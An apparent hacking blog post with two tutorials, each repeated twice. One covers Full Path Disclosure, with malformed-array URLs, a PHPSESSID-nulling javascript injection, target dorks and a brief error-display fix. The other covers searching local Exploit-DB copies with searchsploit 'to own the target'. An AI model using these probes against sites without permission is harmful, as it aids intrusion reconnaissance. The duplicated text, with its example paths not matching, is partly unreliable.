Hey everybody.Today we are going to talk about a very common web vulnerbility "Full Path Disclosure".
Overview:=
Full Path Disclosure AKA, FPD vulnerabilities enable the attacker to see the internal path structure of an installation. Eg: /home/dir/htdocs/blahblah.
Severity:=Low to Medium
For FPD the severity level is said to be upto medium becoz usually, it's not a vulnerability. It's more of informational risk.
Most of the time it is not exploited itself.But it's a clue to exploitation of other web vulnerabilities like SQL injections loadfile() or LFI etc.
Reason:=
It may sometimes be due to web server application mis-configuration which reveals error messages to website
visitors. Sometimes, an application itself generates debugging error messages.
How To Generate An FPD Error:=
As i said before that FPD can be very useful in cases like SQL injections loadfile() or LFI.So what if you got a site vulnerable to SQL injections loadfile() or LFI but you dont know the root path.There is nothing you can do to it.Once you get the root path you can continue your digging.
Below we are going to discuss some common well known and few less known methods of generating errors for FPD.
1-Empty Array
If we have a site that uses a method of requesting a page like this:
We can use a method of opening and closing braces that causes the page to output an error. This method would look like this:
This renders the page defunct thus spitting out an error:
2-Null Session Cookie
Another popular and very reliable method of producing errors containing a FPD is to give the page a nulled session using Javascript Injections. A simple injection using this method would look something like so:
By simply setting the PHPSESSID cookie to nothing (null) we get an error.
Errors can contain useful information for site owner so instead of disabling the error reporting at all, it is possible to only hide errors from output by display_errors.
3-Dorks:
We can also use dorks to find the errors on a specific site.
Warning: * [function.*]: site:yourtargeritehere.
I prefer using bing.com for this purpose especially when i have to search full server for an error message.
ip:xxx.xxx.xxx.xx sql error
ip:xxx.xxx.xxx.xx fatal error
ip:xxx.xxx.xxx.xx warning:* [function.*]
The creativity of your dorks is upto you.
4-Using SQL Injection Loadfile()
This is also a very good possiblity.I am going to discuss it later in another tutorial.
How to Patch FPD:=
This vulnerability is prevented simply by turning error reporting off so your code does not spit out errors.
error_reporting(0);
php.ini
httpd.conf
Tools
https://code.google.com/p/inspathx/
Refrences:
http://yehg.net/l
https://www.owasp.org/index.php/Full_Path_Disclosure
Overview:=
Full Path Disclosure AKA, FPD vulnerabilities enable the attacker to see the internal path structure of an installation. Eg: /home/dir/htdocs/blahblah.
Severity:=Low to Medium
For FPD the severity level is said to be upto medium becoz usually, it's not a vulnerability. It's more of informational risk.
Most of the time it is not exploited itself.But it's a clue to exploitation of other web vulnerabilities like SQL injections loadfile() or LFI etc.
Reason:=
It may sometimes be due to web server application mis-configuration which reveals error messages to website
visitors. Sometimes, an application itself generates debugging error messages.
How To Generate An FPD Error:=
As i said before that FPD can be very useful in cases like SQL injections loadfile() or LFI.So what if you got a site vulnerable to SQL injections loadfile() or LFI but you dont know the root path.There is nothing you can do to it.Once you get the root path you can continue your digging.
Below we are going to discuss some common well known and few less known methods of generating errors for FPD.
1-Empty Array
If we have a site that uses a method of requesting a page like this:
Quote:http://site.com/index.php?page=about
We can use a method of opening and closing braces that causes the page to output an error. This method would look like this:
Quote:http://site.com/index.php?page[]=about
This renders the page defunct thus spitting out an error:
Quote:Warning: opendir(Array): failed to open dir: No such file or directory in /home/omg/htdocs/index.php on line 84
Warning: pg_num_rows(): supplied argument ... in /usr/home/example/html/pie/index.php on line 131
2-Null Session Cookie
Another popular and very reliable method of producing errors containing a FPD is to give the page a nulled session using Javascript Injections. A simple injection using this method would look something like so:
PHP Code:
javascript:void(document.cookie="PHPSESSID="); By simply setting the PHPSESSID cookie to nothing (null) we get an error.
Quote:Warning: session_start() [function.session-start]: The session id contains illegal characters,
valid characters are a-z, A-Z, 0-9 and '-,' in /home/example/public_html/includes/functions.php on line 2
Errors can contain useful information for site owner so instead of disabling the error reporting at all, it is possible to only hide errors from output by display_errors.
3-Dorks:
We can also use dorks to find the errors on a specific site.
Warning: * [function.*]: site:yourtargeritehere.
I prefer using bing.com for this purpose especially when i have to search full server for an error message.
ip:xxx.xxx.xxx.xx sql error
ip:xxx.xxx.xxx.xx fatal error
ip:xxx.xxx.xxx.xx warning:* [function.*]
The creativity of your dorks is upto you.
4-Using SQL Injection Loadfile()
This is also a very good possiblity.I am going to discuss it later in another tutorial.
How to Patch FPD:=
This vulnerability is prevented simply by turning error reporting off so your code does not spit out errors.
error_reporting(0);
php.ini
PHP Code:
display_errors = 'off' httpd.conf
PHP Code:
php_flag display_errors off Tools
https://code.google.com/p/inspathx/
Refrences:
http://yehg.net/l
https://www.owasp.org/index.php/Full_Path_Disclosure
How To Search For Exploits Using Exploit-DB search BackTrack - Terminal
In hacking we usually look for exploits to own the target, and today I'm going to show you how to look for exploits in Backtrack Inside your terminal!
What Many of us don't know, there is more than 15,000 exploits inside your backtrack written perl, ruby, python and more. But, today we'll learn how to search in those exploits easily, and faster than Googling!
When I use linux, I like to use the terminal for almost everything, and now, we will use it for exploit searching
Lets start,
First of all open your terminal and type this command:
cd /pentest/exploits/exploitdb
![[Image: Untitled.png]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6W2f-hRnvDeGp6ySU4RghC9jycM_Qj817lVZWHV1yuh8hd31D_lAewKh6QVTXHo8pTw7kY-irSfmZsTe27c1gQBaZ7Z_PESrWXsjtrh-vecSGBOYKdy8nimAbK9SFYxiHF4NwaLwNI54/s320/Untitled.png)
as you can see, we have two files and a directory in that directory we entered. For now let's just focus on "searchsploit" file.
We will use this file to find the exploits on our PC, here is how to use it:
./searchsploit term1 term2 term3
what I mean in "term" is something that describes the exploit you're looking for, something that narrows down the search results to only the things you want.
For example, if you want an exploit for java inside windows, and we want the exploit to be DoS. Our command should look like this:
./searchsploit windows java dos
![[Image: How+to+use+exploit+db+on+backtrack.png]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi58m_0NqfRknNwcEKIAN4QP-kgjplM3l6F59Pf5ismsfZXpbl5EMnyWlW5ieAlUaOcQjUydtqgDZYHNqC-4azSstAcaPCakkO67HfS-v92HyVNqD5GfHF70pWRUckWCgbb2GkpWHfy0pA/s320/How+to+use+exploit+db+on+backtrack.png)
That .csv file contains all the names and paths of the exploits, and searchsploit try to find the right exploit for you
Easy, right?
Now you can change the terms and find the exploit you want.
Ok, so we get the exploit description, and a path...
As I mentioned before, there are two files, and one directory.. now we know what those two files do, it's the directory's turn now
that directory contains all of the exploits you need, and their paths.. so just enter, and copy the path to get it..
Let me show you an example.
We used the command:
./searchsploit windows java dos
and got some paths, here is how to get the exploits,
add "platforms" to the beginning of the path, for example
we got:
/windows/dos/11670.py
to read it use
cat platforms/windows/dos/11760.py
![[Image: How+to+use+exploit+db+on+backtrack2.png]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOBnhCdCpZXDkqAN9Qxap-JAfFZFUa9Sgi5gQXpgp3LYBoLcrhZ2R0gRx2e09WTm_sjI5cDP7bzoqDAMi9bwqMFegQnJFKrurTXZpZmPmzWesE-WMIIuy9cQyi_nWAXC8fBc6L-73g2zY/s320/How+to+use+exploit+db+on+backtrack2.png)
That's it you guys =)
Have fun, and happy pentesting!
When I use linux, I like to use the terminal for almost everything, and now, we will use it for exploit searching
Lets start,
First of all open your terminal and type this command:
cd /pentest/exploits/exploitdb
![[Image: Untitled.png]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6W2f-hRnvDeGp6ySU4RghC9jycM_Qj817lVZWHV1yuh8hd31D_lAewKh6QVTXHo8pTw7kY-irSfmZsTe27c1gQBaZ7Z_PESrWXsjtrh-vecSGBOYKdy8nimAbK9SFYxiHF4NwaLwNI54/s1600/Untitled.png)
as you can see, we have two files and a directory in that directory we entered. For now let's just focus on "searchsploit" file.
We will use this file to find the exploits on our PC, here is how to use it:
./searchsploit term1 term2 term3
what I mean in "term" is something that describes the exploit you're looking for, something that narrows down the search results to only the things you want.
For example, if you want an exploit for java inside windows, and we want the exploit to be DoS. Our command should look like this:
./searchsploit windows java dos
![[Image: How+to+use+exploit+db+on+backtrack.png]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi58m_0NqfRknNwcEKIAN4QP-kgjplM3l6F59Pf5ismsfZXpbl5EMnyWlW5ieAlUaOcQjUydtqgDZYHNqC-4azSstAcaPCakkO67HfS-v92HyVNqD5GfHF70pWRUckWCgbb2GkpWHfy0pA/s1600/How+to+use+exploit+db+on+backtrack.png)
That .csv file contains all the names and paths of the exploits, and searchsploit try to find the right exploit for you
Easy, right?
Now you can change the terms and find the exploit you want.
Ok, so we get the exploit description, and a path...
As I mentioned before, there are two files, and one directory.. now we know what those two files do, it's the directory's turn now
that directory contains all of the exploits you need, and their paths.. so just enter, and copy the path to get it..
Let me show you an example.
We used the command:
./searchsploit windows java dos
and got some paths, here is how to get the exploits,
add "platforms" to the beginning of the path, for example
we got:
/windows/dos/11670.py
to read it use
cat platforms/windows/dos/11760.py
![[Image: How+to+use+exploit+db+on+backtrack2.png]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOBnhCdCpZXDkqAN9Qxap-JAfFZFUa9Sgi5gQXpgp3LYBoLcrhZ2R0gRx2e09WTm_sjI5cDP7bzoqDAMi9bwqMFegQnJFKrurTXZpZmPmzWesE-WMIIuy9cQyi_nWAXC8fBc6L-73g2zY/s1600/How+to+use+exploit+db+on+backtrack2.png)
That's it you guys =)
Have fun, and happy pentesting!
No comments:
Post a Comment